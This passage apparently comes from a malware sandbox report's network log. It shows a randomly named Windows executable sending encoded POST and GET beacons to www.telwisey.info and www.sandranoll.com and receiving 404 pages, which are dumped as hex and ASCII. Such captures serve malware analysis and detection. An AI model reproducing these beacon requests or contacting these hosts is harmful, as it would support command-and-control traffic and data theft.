                      Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                      Jul 2, 2024 07:17:43.051364899 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                      Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                      Jul 2, 2024 07:17:43.051805019 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                      Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                      Jul 2, 2024 07:17:43.055417061 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                      Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.549739199.192.19.19806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:44.716671944 CEST1815OUTPOST /ei85/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.telwisey.info
                      Origin: http://www.telwisey.info
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.telwisey.info/ei85/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 51 4d 6a 49 44 30 37 70 52 72 62 4d 30 2b 49 6a 59 2f 2f 33 53 62 38 47 4d 6e 78 6a 6a 55 4c 69 6e 39 77 6c 57 6f 4a 68 35 4e 54 45 68 44 50 38 67 32 78 79 59 7a 76 74 67 58 74 6f 6e 34 71 6a 68 44 75 4c 6a 4d 5a 52 78 55 5a 61 46 61 74 61 47 4d 41 32 35 49 52 72 70 72 64 46 4d 68 43 62 31 73 43 4c 36 6e 54 4c 43 5a 33 75 72 69 70 63 71 38 4e 75 32 54 45 6a 2b 43 37 61 4c 39 35 58 73 4a 30 38 77 48 73 49 77 51 51 32 31 7a 76 2b 79 75 47 47 57 64 33 44 6b 68 51 4a 65 45 2f 6f [TRUNCATED]
                      Data Ascii: 66s0QHx=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdUJ07v/7ysyfXVFI0iGYJxaCEqR0ZJS7NhpaxSwFt5MtCpOUQzjvBSjj1spMkQqYh11p2+MIOlpx26MI8RKhYB+OKSN3Rjqf+D5Mi/Wl2Flno07uhWl5rRyitT7gntxw6QMjID07pRrbM0+IjY//3Sb8GMnxjjULin9wlWoJh5NTEhDP8g2xyYzvtgXton4qjhDuLjMZRxUZaFataGMA25IRrprdFMhCb1sCL6nTLCZ3uripcq8Nu2TEj+C7aL95XsJ08wHsIwQQ21zv+yuGGWd3DkhQJeE/o4swj7QO4QELvu/Lh9v9NVtL2WAc7iye1TFFKZpXK1JoHkpENODrCCUgYFDn5a+RZV6OyL2/CM9UwEMw+z49V8yY9WYc5wyAZpBKQQ9EB690r6DXvnGM14a5JnXFh+g9sR4mYCtlraRZ/qTWiFNxEvLEbAKX4uZfckJQ2xgzHKOhVpL1vsQWZvJUyGhF8YJJ/ESBkllYC7Sj9nQAp3u7tgrPv3mmwJNELDS5SSiiFXeGabwLmZWkG/YLOj2kAm8r/gJsDBqW9MHkuhGpUFB+Pdad9m/KqGRUNEHTer2Rhp1jCXMj0m5qLVi/0sF0NhJtPqGo5ekSZJ7dS9FuWj1vQ517VBlFDOcNNGrdzwh1/aOIh+Ct3V6GD+3nn6c/ckgm8PybPn9ts/xm4bt1jjNhqw9lmi6x6mynN91u+vWQsdpg2q6azKHaUnaYujtSnZRTt6FkLKRFK8rIexVMHfqQ6nOiWqwrvvEanAT1TLLUJP6F1nqCpn3ni2mMtbeVdpparmdFYWxqB3g+A874S1DOVmZgiOu8ANKmImEf14kESYv+IiWCarURtngYAdgLBsiw+tiQwYFWpWWfUsX2/FZqfOZnIUIXnponW85abUmXACpzDE9YJoBOBmL85MykkMsK5A06Cjt9NfLCFlinJgCmUe5jXdFAwDttaMs [TRUNCATED]
                      Jul 2, 2024 07:17:45.627377033 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:45 GMT
                      Server: Apache
                      Content-Length: 16026
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                      Jul 2, 2024 07:17:45.627474070 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                      Jul 2, 2024 07:17:45.627486944 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                      Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                      Jul 2, 2024 07:17:45.627866030 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                      Jul 2, 2024 07:17:45.627876997 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                      Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                      Jul 2, 2024 07:17:45.628530979 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                      Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                      Jul 2, 2024 07:17:45.628597021 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                      Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                      Jul 2, 2024 07:17:45.628607035 CEST1236INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                      Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                      Jul 2, 2024 07:17:45.629069090 CEST1236INData Raw: 2d 31 2e 37 39 33 2d 33 2e 33 2d 32 2e 36 35 34 2d 34 2e 39 36 34 63 2d 31 38 2e 33 39 35 2d 33 35 2e 35 31 31 2d 33 37 2e 32 35 39 2d 38 33 2e 33 38 35 2d 33 32 2e 30 37 35 2d 31 31 38 2e 38 31 37 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: -1.793-3.3-2.654-4.964c-18.395-35.511-37.259-83.385-32.075-118.817" /> <path id="backpack" fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d=
                      Jul 2, 2024 07:17:45.629168987 CEST896INData Raw: 35 2c 36 2e 36 34 39 2c 31 2e 35 39 2c 31 35 2e 31 36 34 2d 35 2e 30 35 39 2c 31 39 2e 30 32 6c 30 2c 30 0a 09 09 09 09 63 2d 36 2e 36 34 39 2c 33 2e 38 35 35 2d 31 35 2e 31 36 34 2c 31 2e 35 39 2d 31 39 2e 30 32 2d 35 2e 30 35 39 6c 2d 35 2e 36
                      Data Ascii: 5,6.649,1.59,15.164-5.059,19.02l0,0c-6.649,3.855-15.164,1.59-19.02-5.059l-5.603-9.663" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-mite
                      Jul 2, 2024 07:17:45.632661104 CEST1236INData Raw: 36 38 35 2d 35 2e 35 36 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                      Data Ascii: 685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M241.978,395.324c-3.012-5.25-2.209-11.631,1.518-15.977c-2.701


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.549740199.192.19.19806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:47.253896952 CEST523OUTGET /ei85/?66s0QHx=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXhR90PBHPgFvMy30KUVoXMjhVhw+zOJlVxwLOJt1WoLc5Mw==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.telwisey.info
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:17:47.960751057 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:47 GMT
                      Server: Apache
                      Content-Length: 16026
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                      Jul 2, 2024 07:17:47.960773945 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37
                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.
                      Jul 2, 2024 07:17:47.960783958 CEST1236INData Raw: 34 36 31 2c 34 2e 36 36 38 2c 32 2e 37 30 35 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: 461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet">
                      Jul 2, 2024 07:17:47.960998058 CEST1236INData Raw: 63 33 36 2e 30 36 39 2c 30 2c 36 38 2e 39 37 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e
                      Data Ascii: c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterli
                      Jul 2, 2024 07:17:47.961219072 CEST1236INData Raw: 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39
                      Data Ascii: h="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stro
                      Jul 2, 2024 07:17:47.961230993 CEST672INData Raw: 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d
                      Data Ascii: 555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g>
                      Jul 2, 2024 07:17:47.961544991 CEST1236INData Raw: 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                      Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="
                      Jul 2, 2024 07:17:47.961555004 CEST224INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20
                      Data Ascii: > </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977"
                      Jul 2, 2024 07:17:47.961565018 CEST1236INData Raw: 63 79 3d 22 32 35 35 2e 39 37 38 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74
                      Data Ascii: cy="255.978" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke
                      Jul 2, 2024 07:17:47.961576939 CEST1236INData Raw: 35 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 53 6d 61 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                      Data Ascii: 52" /> </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fil
                      Jul 2, 2024 07:17:47.966187954 CEST1236INData Raw: 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 4d 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 6c 2d 36 34 2e 37 32 36 2d 31 37 2e 33 35 33 63 2d 31 31 2e 30 38 36 2d 32 2e 39
                      Data Ascii: ="round" stroke-miterlimit="10" d="M338.164,454.689l-64.726-17.353c-11.086-2.972-17.664-14.369-14.692-25.455l15.694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.549741213.145.228.16806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:53.138400078 CEST781OUTPOST /aroo/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sandranoll.com
                      Origin: http://www.sandranoll.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.sandranoll.com/aroo/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 38 2b 70 47 64 65 47 38 5a 70 73 32 46 4a 4d 37 64 68 78 39 31 7a 49 44 36 48 4d 53 59 4f 50 77 53 37 33 30 58 79 49 69 6c 51 64 6e 36 4b 47 61 70 77 76 64 4b 43 6e 47 48 49 4f 4e 58 54 65 69 63 30 73 47 56 67 75 57 44 44 34 36 76 2f 6c 42 73 67 6d 41 66 57 4f 48 57 6d 45 6d 6b 48 76 67 54 30 31 31 62 62 50 43 63 58 78 74 41 45 30 33 78 6a 32 31 4f 67 52 41 74 4c 56 5a 6a 4c 72 30 6a 41 72 43 66 43 6d 64 57 6b 38 64 51 63 6b 58 4e 76 70 6c 36 59 59 57 7a 32 66 62 6c 75 75 30 4d 6f 59 50 42 48 57 30 39 51 46 34 69 74 50 34 51 44 48 2f 6c 6e 32 50 75 66 6f 3d
                      Data Ascii: 66s0QHx=WIabGlVXn4l28+pGdeG8Zps2FJM7dhx91zID6HMSYOPwS730XyIilQdn6KGapwvdKCnGHIONXTeic0sGVguWDD46v/lBsgmAfWOHWmEmkHvgT011bbPCcXxtAE03xj21OgRAtLVZjLr0jArCfCmdWk8dQckXNvpl6YYWz2fbluu0MoYPBHW09QF4itP4QDH/ln2Pufo=
                      Jul 2, 2024 07:17:53.832395077 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:53 GMT
                      Server: Apache/2.4.56 (Debian)
                      X-Powered-By: PHP/7.4.33
                      Strict-Transport-Security: max-age=63072000; preload
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
